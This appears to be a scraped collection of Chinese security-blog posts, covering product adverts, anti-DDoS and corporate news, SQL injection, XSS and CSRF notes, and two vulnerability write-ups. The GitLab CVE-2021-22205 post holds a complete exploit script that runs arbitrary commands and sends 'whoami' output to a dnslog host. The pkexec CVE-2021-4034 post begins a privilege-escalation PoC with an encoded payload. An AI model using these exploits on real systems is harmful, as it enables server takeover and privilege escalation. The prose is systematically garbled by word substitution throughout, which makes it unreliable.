咱们始终器重客户服务,以过硬的业余技术为立身基本。专一实验室罕用色谱、质谱、光谱等剖析设施,组建和造就了一批有能力笼罩市场支流品牌厂家产品的业余保护维保队伍,其中不乏来自支流进口品牌的多年资深工程师,对硬件、软件、利用办法等十分相熟,具备近程研判状况、惯例预防性保护、常见故障判断排除、疑难问题梳理解决等能力,是您值得信赖和托付的实验室合作伙伴。 保护颐养:零部件精修服务实验室分析仪器零部件精修服务为您提供:1)要害零部件精修,如泵,电路板等关键部件的培修,均含有质保,节省成本;2)要害零部件平价代替,均含有质保。 短、中、长期综合维保服务 1、不限次数上门服务 2、故障诊断 3、技术支持 4、仪器备件优先享受 5、保修服务能够季度、年度、2-5年度灵便服务 6、三个等级:全包、半包、经济型(免工时费仅预防性维保) 具体价格需由您提供实验室须要保修的仪器设备清单综合估价。

February 25, 2022 · 1 min · jiezi

关于安全:游戏DDoS防护新思路SDK版

目前游戏行业仍是攻打的重灾区,这个产品也应运而生,采纳分布式节点部署,攻打流量扩散在不同的节点上,能够无下限进攻DDOS,CC攻打其余协定攻打等。十分全面的进攻各种攻打入侵浸透,同时为用户拜访减速。此产品设计之初仅仅是“江湖救急”为了帮忙几个敌人的游戏和在线教育平台抵制大流量攻打,起初敌人介绍敌人,一直有平台接入测试,为不少平台轻松防护了辣手的流量攻打。因为传统高防的有余,针对TCP端口的CC攻打没有太好的过滤策略,外加流量攻打量一直飙高,依附硬防生抗成果不现实同时防护价格昂贵等,产品通过一直历练进行了三次重构。目前产品曾经足够稳固。这个产品是一款专一于C/S架构的平安防护产品,利用分布式星散群拦挡针对用户服务器的CC攻打、DDOS攻打,通过在APP客户端集成SDK进攻模块,来实现精准疾速的切换以及链路加密通信,因为采纳了隧道加密通信技术,应用动静虚构IP连贯,因而,任何DDOS攻打流量都无奈进入隧道,同时还能够暗藏实在服务器IP。整个防护由三大模块组成,别离是客户端SDK、智能调度和身份验证。简略演示一下大略成果,有感兴趣的敌人能够进行沟通交流。市面上有不少同类商用产品,各有各的长处,这个产品并非商业软件,而是之前给客户平台提供运维时候本人团队开发的产物,有须要的能够收费提供部署和搭建。后续依据理论状况思考开源。一、生成SDK文件通过搭建jenkins在线生成SDK文件产品反对android\ios\windows三端的源码和无源码集成。轻易从搜索引擎找了一款游戏app进行演示,因为间接下载的apk文件并无源码,因而,通过逆向的形式将SDK集成进去。通过脚本进行集成之后进行测试(三端无源码集成过程后续独自写一个独立的介绍)。如果客户端有微信登录须要提供证书文件进行重签名。 二、抓包剖析首先装置原版app进行抓包剖析。通过原版抓包能看到大量dns申请以及http明文申请数据。再将逆向集成SDK的app进行装置并抓包。SDK启动的时候会HOOK掉app的所有网络通讯,因为SDK和节点之间是加密传输的,因而抓包也无奈获取dns解析记录以及http、tcp等明文信息,全部都是公有加密协议进行了封包。(截图中dns解析记录应该是在app启动SDK之前或者手机其余app解析申请)比照原版app的dns解析记录。62001端口为SDK跟节点加密通信端口。所有数据都被加密传输,无奈解密出明文数据。上图为节点外面进行dns解析服务,所有的客户端dns解析都会在远端节点进行解析,从而防备了dns净化和劫持。也能够防止攻击者获取域名信息。集成SDK之后抓包看到的全部都是加密封装后的TCP数据包。抓包看到SDK跟调配的节点117进行通信,在IP为117的节点外面将加密隧道程序断开,模仿节点被攻打产生无法访问的状况。抓包看到SDK迅速切换到调配给用户的第二个可用IP154.所有的切换都是无感知进行的。为了防止攻击者反复拉取全副节点池,SDK的验证端做了身份辨认,token、deviceid等形式进行验证。每个用户调配的一组3个ip都不会反复,如果攻击者打死调配给他的节点IP,也只会影响到黑客本人。断线重连,节点异样主动切换。SDK计划长处次要是不依附生抗来防护,而是通过大量分布式节点调度防护。其次能完满防护CC攻打,因为节点对外不提供任何业务端口,只对外开放一个加密传输隧道端口(62001)。SDK节点切换都是霎时切换,不依附域名dns解析形式。cname防护集群切换依附域名解析同时无奈实现无缝切换,并且防CC成果仍然不现实。Q & A 问答集1、端口防CC成果如何?答:SDK跟节点之间通信是建设一个加密隧道,只有APP集成sdk之后的数据才会进入,攻打量无奈进入隧道内,同时节点不对外开放任何业务端口,只有一个加密隧道通信端口62001凋谢。因而,任何针对业务端口的CC都起不到任何成果。所有的业务数据都通过封装发送到节点的加密隧道端口,达到节点之后进行解密解包将用户业务数据发送给原站服务器。2、最高能进攻多大攻打量?答:因为不是依附高防的生抗模式,全副都通过调度算法调配节点,因而,黑客攻击打死的节点也只是影响黑客本人,通过多层辨认,杜绝全副节点被拉取。用户能够在调配的一组惟一IP之间无感知切换。cname高防转发模式则会呈现掉线,提早高,过滤规定误封实在用户的状况。无感知切换是通过SDK进行解决的,不存在通过cname域名进行调度切换的弊病。3、文中提到的虚构IP如何应用?答:为了更好的爱护APP不被逆向破解,咱们倡议用户客户端链接服务端的域名解析到虚构IP,如果客户端绑定的是IP地址,能够换成咱们的虚构IP。虚构IP是一个环路IP不会在互联网上传输,然而客户端集成SDK之后就能够应用虚构IP跟咱们节点建设加密通信了。虚构IP相似127.0.0.1~127.0.0.2554、集成之后是否能够抓包到客户端明文数据?答:APP集成SDK之后会hook全副app的通信数据封装到咱们的加密协议外面,并与节点建设加密隧道。任何数据都是加密之后传输的,通过抓包是无奈显示明文的。有的客户有独自需要,比方社交视频等app,这类客户流媒体数据较多,如果都走节点会造成减少老本和担心额定提早等状况,因而sdk反对例外设置,比方链接第三方流媒体或者存储更新资源等无需爱护的链接进行直连拜访。

February 25, 2022 · 1 min · jiezi

关于安全:百度安全入选中国工业互联网安全市场研究报告推荐服务商

近几年在政府的鼎力推动下,工业企业踊跃转型降级,工业互联网市场失去了疾速倒退。而在这个过程中网络攻击无处不在,网络安全威逼给工业企业数字化转型带来微小的平安挑战。工业互联网安全建设波及能源、制作、公共事业等行业,涵盖了工业互联网畛域各个环节所需的安全软件、硬件及服务。IDC示意,在合规与刚需的双重驱动下,寰球工业互联网安全市场倒退迅猛,以制造业为例,寰球制作行业客户在平安方面的收入占网络安全总体收入市场的16.5%,仅次于金融行业;2020年,中国工业互联网市场规模曾经达到2,800亿元人民币,将来也将放弃继续的疾速倒退,相应的,中国工业互联网安全市场将来倒退也将出现对应的高速增长趋势。 通过对中国工业互联网市场上下游产业链的调研,《IDC Perspective 中国工业互联网安全市场钻研》报告,对工业互联网安全波及的产品、服务和客户案例的深刻的剖析,说明了工业互联网安全市场以后局势、平安建设要点、技术提供商能力状况,为工业互联网畛域的购买者在抉择解决方案、供应商时提供参考。百度平安以弱小的AI算法能力与多项独创、专利及自研技术入选本次报告。 百度平安在工业互联网安全业务畛域为客户提供可扩大的工业端到端平安解决方案,波及内容包含工业互联网平台的全息平安透视和威逼感知、可信虚构网络边界、数据隐衷资产隔离等,通过“3 库+2 算法”,汇聚安全漏洞、恶意代码、勒索病毒等信息的工业互联网安全漏洞库;涵盖工业协定、设施指纹、IP/域名、开源框架的根底资源库;对工业互联网安全钻研造成的攻击行为库;以及基于百度弱小的AI 算法(ML+图谱),能够在工业利用产品、工厂零碎、异构的工业网络和传 感器上迅速部署,从而帮忙企业解决平安问题,赋能企业的生产力和效率。在平安业务笼罩经营平安、数据安全、利用平安、云和IT 网络安全、OT网络安全、终端和物联网平安以及身份认证平安等畛域,产品包含主机平安、DDoS、平安检测、流量审计、利用防火墙、点石隐衷计算平台、 利用加固与平安检测、云虚拟主机利用防火墙、园区危险识别系统等数十款。落地行业笼罩智能家居、 智能驾驶、智能可穿戴、智慧金融、智慧安防、工农商医交通、物联网、智能网联车、车路协同、 安防、工业制作数字化降级、设施认证、工控等行业。 更值得关注都是,百度平安在自研技术方面领有多项独创、专利及自研技术,构建起计划的整体逻辑框架。如独创自适应KARMA 热修复技术囊括了9 项专利技术,并已登陆BlackHat、USENIX 等国内顶级平安会议, 现已运行在笼罩多个行业近亿台终端设备中。在利用很广的云端层面,百度平安领有OpenRASP下 一代云端平安防护系统、HugeGraph大规模图数据库、AdvBox反抗样本工具箱和MesaTEE下一代可信平安计算服务等。 在过来一年内,百度平安符合国家各项法律法规政策的颁布,在AI 模型平安、数据安全与隐衷爱护、 AIoT平安、云平安等多个方面获得冲破,在工业态势感知、工业主动防御、工业云平安、等保2.0 合规、关基爱护合规等全方位工业互联网安全解决方案,全面赋能能源、交通、制作、政务、水利、 公共服务等畛域的智能化革新,同时在专利规范数量上处于业界领先水平。 百度平安是百度旗下,以AI为外围、大数据为根底打造的平安品牌,是百度在互联网安全22年平安实际的总结与提炼。独创AI平安Security、Saftety、Privacy三大维度,钻研方向涵盖AI平安、云平安、数据安全与隐衷爱护、物联网平安等前沿平安畛域;业务笼罩百度各种简单业务场景,同时面向平安生态、商业合作伙伴输入平安产品与行业一体化解决方案,全面护航AI时代云上平安各大业务场景。在近五年的国内平安顶会中,论文发表数量在国内科技公司中位列第一。面向行业生态,一方面,施展技术能力打击包含电信网络欺骗、赌博、隐衷窃取在内的各类违法犯罪行为,帮助公安机关破案数百起,涉案金额达数亿元人民币,一方面,以技术开源、专利共享、规范驱动为理念,联结生态合作伙伴推动AI时代的平安生态建设。

February 25, 2022 · 1 min · jiezi

关于安全:长情岁月-感恩有你-奋力同行再出发

十年磨一剑,弹指一挥间。2022年2月21日,郑州埃文计算机科技有限公司(简称“埃文科技”)举办五年、十年司龄员工感恩仪式&2022年工作布局与部署大会,表彰入职满五年、十年员工,感激他们在岗位上多年如一日的恪尽职守与倾心贡献。 五年风雨 十年相伴 感恩有你 仪式随同着感人肺腑的音乐拉开帷幕,由企管核心负责人田慧主持。田慧首先介绍埃文科技十年的倒退历程;随后发表入职期满五年5人、十年4人名单,最初由总经理助理梁擎、副总经理邱欣杰为员工颁发感恩贺礼iPhone13与Mac Book14。图 1副总经理邱欣杰为入职满五年员工颁发iPhone13 图 2总经理助理梁擎为入职满十年员工颁发Mac Book14 凝心聚力 扬帆起航 再创辉煌 埃文科技副总经理邱欣杰、武可嘉作2021年工作成绩汇报报告与2022年工作指标。邱欣杰从财务指标、业务停顿、团队建设等方面进行汇报与布局阐明,武可嘉从产品研发、技术创新、我的项目反对等方面进行汇报与布局阐明。 图 3副总经理邱欣杰作成绩汇报报告 图 4副总经理武可嘉作成绩汇报报告 埃文科技董事长王永首先对坚守五年、十年以上员工表示感谢与恭喜,心愿他们再接再厉,施展老员工优良骨干作用,为新员工作表率,共进共勉!随后,王永对2021年度指标达成状况进行深入分析与总结,从产品与我的项目、经营与市场、财务倒退、团队治理等方向提出2022年倒退布局指标,并部署相干具体工作事宜。 图 5董事长王永作总结发言 感恩有你 下一个五年、十年 奋力同行、再创佳绩

February 22, 2022 · 1 min · jiezi

关于安全:邀请函3月4日平台赋能-数智创新-用友BIP-PaaS云平台iuap数智化百城论坛济南站

February 18, 2022 · 0 min · jiezi

关于安全:安全工程师知识点

*sql注入 四种办法 联结注入基于谬误的注入布尔盲注延时注入联结注入 要求:联结的两张表有雷同的列数和雷同的数据类型步骤:首先用order by确定列数,再结构union 查问(如union select 1,database(),version() --+)获取,通过返回值确定指标点获取的是哪些列的值,再将这些列做替换获取指标数据库名、表名、列名等基于谬误的注入 原理:通过报错返回的后果确定信息布尔盲注 原理:利用布尔值的后果判断结构语句的正确性延时注入 原理和布尔盲注相似,在页面不提供反馈时,通过sleep函数设置时延,通过相应工夫判断正确性 —— e.g. and if(length(database())>5,sleep(5),0) --+*XSS 三种类型 1.存储型XSS 2.反射型XSS 3.DOM存储型XSS 将脚本永恒保留至服务器端,如嵌入帖子、评论等,当客户端关上页面时就会执行注入脚本,导致敏感信息发送到攻打端反射型XSS 须要疏导客户端点击攻击者结构的歹意URL,将恶意代码参数增加到客户端的页面中被执行DOM进攻:输出过滤*CSRF 原理:伪造用户发送申请,在用户关上失常站点并通过可信验证后,又关上了歹意页面,此时歹意页面伪造用户身份向失常服务器发送申请,次要是实现身份窃取,盗取用户权限进攻: 验证 HTTP Referer 字段:Referer字段表明了申请起源,当攻打方要求拜访时,他会指向攻打方,但有些浏览器能够批改这个值,且有时会产生误报。在申请地址中增加 token 并验证,结构黑客无奈伪造的局部,因为token须要退出到get/post的参数中,而攻击者只是借用,无奈获取cookie内容,因而无奈结构token在 HTTP 头中自定义属性并验证*文件上传破绽 用户端检测绕过:抓包批改后缀服务端检测:黑白后缀名单、Content-Type(示意文件类型)校验、文件magic number校验绕过形式:1.批改Content-Type 2.文件头部增加正当的magic number 3.文件00截断绕过(检测的是最初的后缀,截取的是00之前的局部)

February 17, 2022 · 1 min · jiezi

关于安全:成功通航用宜搭提升数字化管理效能确保每次飞行任务安全执行

简介:宜搭帮忙山西胜利通航节俭了100万左右的老本,同时使治理经营效率晋升了76%。 山西胜利通用航空股份有限公司 50-100人 / 航空运输 / 山西-长治 / 胜利通航综合治理平台 “通用航空迎来倒退时机,随着通航行业‘放管服’政策的一直推动,通航市场不断扩大,通航须要在平安根底上,标准本身的倒退。利用成熟的互联网信息技术和低代码技术,能将传统的通航各维度治理引向数据化治理,实现信息共享、数据积淀、业务流程标准化。”——山西胜利通用航空公司副总经理 高向青 山西胜利通用航空股份有限公司位于山西省长治市,成立于2013年1月,为全国首家固定翼通用航空上市企业。经营范围包含人工影响天气、航空护林与灭火、公务机代/托管、大气物理探测、大气环境治理、应急救济、科研试飞、高空服务代理等业务。 始终以来,胜利通航保持平安为本,保障每一次航行精准无误,并一直晋升业务能力与服务质量。随着国内通用航空事业的疾速倒退,行业和市场也对胜利通航提出了更高的要求,胜利通航原有的治理形式中存在的问题也逐步浮现。 公司不同部门都亟需数字化改革市场部:短少对合同的治理,合同都是纸质模式,没有做电子归档。不仅日常调阅艰难,也无奈满足对合同的收款、付款、开票等进行对立治理的需要,造成合同结算危险无奈把控的场面。 航务部:短少对各类数据的监控伎俩,不能直观看到航行的根底数据,给航行组调度和航行工作下达带来了不便。日常工作中只能借助电话等形式获取航行的具体信息,给考核飞行员作业KPI造成阻碍。 航材部:短少飞机燃油补充和耗费状况的线上统计伎俩,飞机加油数据只能通过人工核查发票的形式统计,容易出错。 安技部:不能被动按期筛查未失常执行工作的飞机,不能线上核查航空安全检查清单和查看飞机运行的总体状况,给飞机运行带来了安全隐患。 飞机维修部:不足无效的培修管理手段,难以做到依据保护标准按时颐养部件,只能通过纸质表单查阅飞机培修件保护记录,效率低又容易出错。 2018年5月,胜利通航开始应用钉钉治理公司的审批等业务,解决了一部分线上协同和浅层的数据收集问题。 对于航空治理中许多简单的业务数字化场景,钉钉根底性能无奈满足。胜利通航在数字化转型摸索中,也曾试用过市场上的航空管理系统,但因为这些产品不反对定制或者二次开发老本昂扬,只能逐渐放弃。 2021年初,胜利通航偶然间发现了钉钉宜搭低代码平台,并在官网提交了征询申请,随后钉钉宜搭合作伙伴上海致拓和胜利通航进行了沟通,并给出了一整套具体的钉钉宜搭数字化解决方案。 2021年7月,在试用半年后,胜利通航正式开始应用钉钉宜搭。 山西胜利通用航空公司副总经理高向青提到:"宜搭低代码平台不仅能通过利落拽的形式疾速搭建利用,并且自定义空间十分大,能帮忙咱们将业务疾速落地,给大家都留下了粗浅的印象。” 智能全面的管理系统,打造平安高效经营体系借助钉钉宜搭,上海致拓为胜利通航建设了胜利通航综合管理系统,这套零碎满足了航务作业、航务协同、飞行员治理、飞机培修的业务需要,整体进步了飞机的安全性、适航性,晋升了航空航行数字化治理效力,明显降低人工核查的危险。这套零碎也使得各个部门间能更够高效协同工作,同时达到了民航局的数字化要求。 时控件状态报表:实时查看并剖析飞机衰弱状态,不便航务人员疾速安顿航行工作和检修打算。 航行工作治理:实时查问飞行员档案与工作清单,确保每一次航行工作都能够指派给最合适的飞行员。 飞机机体定检状态:依据实时报表查看每架飞机定检工作的执行状况,确保所有飞机都处于衰弱的运行状态中,防止存在隐患的飞机进入航行工作。 自定义工作台:挪动端的工作台能够依据员工应用频次和重要水平自定义设置,极大中央便了员工日常操作。 胜利通航借助钉钉宜搭建设的这套综合管理系统,显著晋升了员工的工作效率,业务人员再也不必手工做各种统计报表,异地办公人员也能轻松查阅材料以及接管工作。整套零碎实现了各部门线上协同作业,不便决策者随时随地查看在线报表,更加清晰公司航务航行整体运作状况。 “市场上的标品可能须要收入120万,自主研发的老本是购买标品的三倍,但应用钉钉宜搭后咱们的零碎洽购老本节俭了100万左右。综合比照历年的数据,应用宜搭至多帮咱们把治理经营效率晋升了76%。”高向青说道。 将来,胜利通航会持续开掘数据的价值,做到智能化经营治理,将低代码、大数据分析等技术和理论业务联合起来,让公司各部门更加高效、高质量地运行。 原文链接本文为阿里云原创内容,未经容许不得转载。

February 14, 2022 · 1 min · jiezi

关于安全:微步在线TDP线上挑战赛即将开赛苹果三件套大疆云台静电容键盘免费拿

各位徒弟、ladies and 乡亲们! 粗事儿了,细小事儿了! 关系到,看到这里的你 能不花一分钱 拿到“苹果三件套”的小事! 咱们微步最近搞了个攻防挑战赛 你们来展现利用破绽的各种姿态 而咱们,则会用自家产品—— 威逼感知平台TDP,进行检测 如果你的攻打没有被咱们检出 祝贺你,得分! 本次挑战赛奖金池价值133,700元共设置一等奖、二等奖、三等奖和优秀奖四类奖项,将角逐出30位获奖选手! 另外,但凡获得无效问题的选手均能够取得主办方微步在线和本次赛事特邀合作伙伴 提供的礼包一份! TDP是微步旗下基于流量的威逼感知平台 推出4年无余,产品成熟,客户泛滥 (广告一条五毛) 因为TDP的检测基于流量 所以选手须要提交PCAP包来参赛 咱们将在5分钟内给出检测后果 24小时内给出最终得分 选手可在赛事官网实时关注检出停顿及积分 咱们将实时展现全网积分排名状况 欲知更具体的比赛规则及选手须知 请点击进入赛事官网或退出本次赛事官网选手群咱们会不定期在群里公布积分翻倍流动哦! 最初,微步在线承诺!本次赛事秉承偏心、公开、公正的准则无任何暗箱操作行为(已禁止微步外部员工参加较量) 咱们怀揣着对平安、攻防的敬畏之心只以实在后果论高下!点击官网直通车直通赛事官网 是兄弟,就一起来提交PCAP! 赛事官网直通车:https://challenge.threatbook....

February 10, 2022 · 1 min · jiezi

关于安全:CVE202122205-Gitlab-exiftool-远程命令执行漏洞

一、背景公司某服务器受到攻打,排查后发现攻破点为CVE-2021-22205 Gitlab 近程命令执行破绽影响版本 Gitlab CE/EE < 13.10.3Gitlab CE/EE < 13.9.6Gitlab CE/EE < 13.8.8二、原理次要是gitlab调用了exiftool(一个图像处理软件),而exitftool存在命令执行破绽(CVE-2021-22205),从而导致gitlab也存在此问题,现复现一下该破绽。三、攻打脚本执行以下脚本后在服务器复现了该破绽 import requestsfrom bs4 import BeautifulSoupimport base64import randomimport sysimport osimport argparserequests.packages.urllib3.disable_warnings()def title(): print(""" ______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___| | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) | \____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/ Author:Al1ex@Heptagram Github:https://github.com/Al1ex """) print(''' 验证模式:python CVE-2021-22205.py -v true -t target_url 攻打模式:python CVE-2021-22205.py -a true -t target_url -c command 批量检测:python CVE-2021-22205.py -s true -f file ''') def check(target_url): session = requests.Session() try: req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False) soup = BeautifulSoup(req1.text, features="html.parser") token = soup.findAll('meta')[16].get("content") data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{curl `whoami`.82sm53.dnslog.cn} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n" headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "Connection": "close", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5", "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"} flag = 'Failed to process image' req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False) if flag in req2.text: print("[+] 指标 {} 存在破绽".format(target_url)) else: print("[-] 指标 {} 不存在破绽".format(target_url)) except Exception as e: print(e)def attack(target_url,command): session = requests.Session() try: req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False) soup = BeautifulSoup(req1.text, features="html.parser") token = soup.findAll('meta')[16].get("content") data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{"+ command +"} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n" headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "Connection": "close", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5", "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"} flag = 'Failed to process image' req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False) if flag in req2.text: print("[+] 指标 {} 存在破绽".format(target_url)) print("[+] 请到dnslog或主机查看执行后果") else: print("[-] 指标 {} 不存在破绽".format(target_url)) except Exception as e: print(e)def scan(file): for url_link in open(file, 'r', encoding='utf-8'): if url_link.strip() != '': url_path = format_url(url_link.strip()) check(url_path)def format_url(url): try: if url[:4] != "http": url = "https://" + url url = url.strip() return url except Exception as e: print('URL 谬误 {0}'.format(url)) def main(): parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE') parser.add_argument('-v', '--verify', type=bool,help=' 验证模式 ') parser.add_argument('-t', '--target', type=str, help=' 指标URL ') parser.add_argument('-a', '--attack', type=bool, help=' 攻打模式 ') parser.add_argument('-c', '--command', type=str, help=' 执行命令 ') parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ') parser.add_argument('-f', '--file', type=str, help=' 文件门路 ') args = parser.parse_args() verify_model = args.verify target_url = args.target attack_model = args.attack command = args.command scan_model = args.scan file = args.file if verify_model is True and target_url !=None: check(target_url) elif attack_model is True and target_url != None and command != None: attack(target_url,command) elif scan_model is True and file != None: scan(file) else: sys.exit(0) if __name__ == '__main__': title() main()参考资料原理:https://devcraft.io/2021/05/0...POC:https://github.com/Al1ex/CVE-... ...

February 8, 2022 · 3 min · jiezi

关于安全:CVE20214034-Linux-Polkit-权限提升漏洞

一、背景材料Polkit是一个应用程序级别的工具集,通过定义和审核权限规定,实现不同优先级过程间的通信:管制决策集中在对立的框架之中,决定低优先级过程是否有权拜访高优先级过程。Polkit在零碎层级进行权限管制,提供了一个低优先级过程和高优先级过程进行通信的零碎。和 sudo 等程序不同,Polkit 并没有赋予过程齐全的 root 权限,而是通过一个集中的策略零碎进行更精密的受权。Polkit定义出一系列操作,例如运行 GParted, 并将用户依照群组或用户名进行划分,例如 wheel 群组用户。而后定义每个操作是否能够由某些用户执行,执行操作前是否须要一些额定的确认,例如通过输出明码确认用户是不是属于某个群组。因为Polkit的 Pkexec工具中存在一处本地权限晋升破绽,以致攻击者能够通过管制环境变量,从而诱导Pkexec执行任意代码。利用胜利后,可导致非特权用户取得管理员权限。 二、破绽剖析如果命令行参数argc的数量为 0,这意味着如果传递给execve()的参数列表 argv为空,即 ,那么 argv[0]将为 NULL,是参数列表的终止符,这将导致:Pkexec代码中第 534 行,整数 n 设置为 1;第 610 行,从 argv[1] 越界读取指针门路;第 639 行,指针 s 被越界写入argv[1] ;然而从这个越界的 argv[1] 中读取和写入的到底是什么呢?要答复这个问题,咱们须要晓得的是:当execve() 一个新program时,kernel将咱们的参数、环境变量字符串以及指针(argv 和 envp)复制到新program堆栈的开端,如下图:因为argv和envp 指针在内存中是间断的,如果 argc 为 0,那么越界argv[1] 实际上是 envp[0],即为指向咱们的第一个环境变量“value”的指针。最终导致:Pkexec代码中第610行,将要执行的程序的门路从argv[1](即envp[0])中越界读取,并指向“value”;因为“value”不是以斜线结尾,因而进入 629 行的if分支,并在第 632 即将这个 “value”传递给 g_find_program_in_path()随后,g_find_program_in_path() 在PATH 环境变量目录中搜寻一个名为“value”的可执行文件。如果找到这样的可执行文件,则将其残缺门路返回给 pkexec的 main() 函数。最初,这个残缺门路被越界写入 argv[1](即 envp[0]),从而笼罩了咱们的第一个环境变量,见下图红框处:所以精确的说:如果咱们的 PATH 环境变量是“PATH=name”,并且如果目录“name”存在(在当前工作目录中)并且蕴含一个名为“value”的可执行文件,则写入一个指向字符串“name/value”的指针越界到 envp[0];或者说:如果咱们的 PATH 是“PATH=name=.”,并且目录是“name=.” 存在并蕴含一个名为“value”的可执行文件,而后将指向字符串“name=./value”的指针越界写入 envp[0]。换言之:这种越界写入容许咱们将一个“不平安”的环境变量(例如,LD_PRELOAD)从新引入 pkexec 的环境。这些“不平安”变量通常在调用 main() 函数之前曾经被ld.so从 SUID 程序的环境中删除。三、破绽复现# https://github.com/nikaiw/CVE-2021-4034/blob/master/cve2021-4034.py#!/usr/bin/env python3# poc for https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt found by qualys# hardcoded amd64 libfrom ctypes import *from ctypes.util import find_libraryimport osimport zlibimport base64import tempfilepayload = zlib.decompress( base64.b64decode( """eJztW21sFEUYnr32ymG/TgPhpAQuBhJA2V6BKh8p1FZgUTAFW0OiuL32tteL9+XuXmmRQA1igkhSFRI1JmJioPEXJPrDH2pJm8bEP5KYqD9MqoSkjUQqKgLRrjO777vdHXqUGDUhmafsPfu+8z4zs7szc2zunUNbdmwNSBJBlJBNxLbudexG8A/WuSHUt46U089FpMaOLSXF8VaZn0nYIaYLemyelwX87NXZ7UXBz3FI8rNXx7oQlsG9yc95aKeXay8Auijoopv8PCT5OQTyUjgGoT6e+e7zui8gjuelxM9475+6ZCb+SXstoFsKBTyvJX7G9nZRHT7SOwE+3t3QXrHnMCn5GR9jKdTBxsy2J9vYcxlivhJP+TywWfnBXXWr3s18dG7sdNlP5cMjT5/49PmLLI7djnIyPR5YtaXkAdtXQY/OikPV9Wd299/uOqIz+F+mx30z+KUi8YUi8ceK+B8qUk9Xkfit9HhgBv+BIvGZIv42219FPoH1oBz8z4B/BPytKFDVZCaXVQ0zrpuqStTtrTvVhKZryZRhanrrzuZ0Lqu1xjvSmlM2c4na2RtXu1LZeDq1XyPJzly2x/lUU9mUSQzNLKQSjDTgJJiMtV6ts0ejRCPTqY5O2cjJD5NtO7Y3Naur5dVyvd3RgH3gJ/uT4G+ATI/XwsLUXBbxDtg4TnH+nIXrj3D+PPhbGv1+tNs5fygKOs5fDv6xzQ6zMTu9WhMy7vGXePyTHr93nl73+EMefwTanUOcO4OIevzedX65xx/0+GMe/xyPf53HP9fjb/T47yECAgICAgICAgL/NX6tXnxTOXw5pBwLfldLiHJkyAxYXymHR0LDdrlV/yN1X7WWXaRUvcSO72YFVyd+sCxrwLYl277g2gHbPu/aJbZ9zrVLbft91w7a9uto09b22q095vSP2hnO1jibj2/j7J2cvQVt5XhDH7vu40Gd0frr5nx6K0Zl51bMtcaql/Szyx0GpvHb7fj6JkYrppSjk8r5nzcr56+XKNKocmHKnEcrOAkVhKyxLrsd1LP2+xuCVEsKD7Yphxt09iKsHL1kVijHGj6jxviNKcsaT9CbMRr8ntrSXqr16Sf20UJ20kZ1A3uH8fRzFjB+k8qds7CFZ6Ou7zI9U47PL8j2NTxnU8MflbTkDTdmcMqp3h4X7kgQEBAQEBAQEBAQEBAQuJtR25HK1hrdhP5rebRVaWD2htqCoTsnBv0kUk3Jxhhxfuf584pl7aCcnrQsk/IByq9RPvmLZX1A+RTlEeL8Fssg7d9NpN6wVFMxJzQgOb9bL6LHIK0nzwKqwlurIo9Xl+8L9ZPNCzesXLPU/tmS6elrM5mkcWFPf5n/WXqMU3+7x8/qZP2ZoP2xf6PcUhV+JdBcWdZEG6ZmhB4n6PE1LW/1lv/bN1RAQEBAQEBA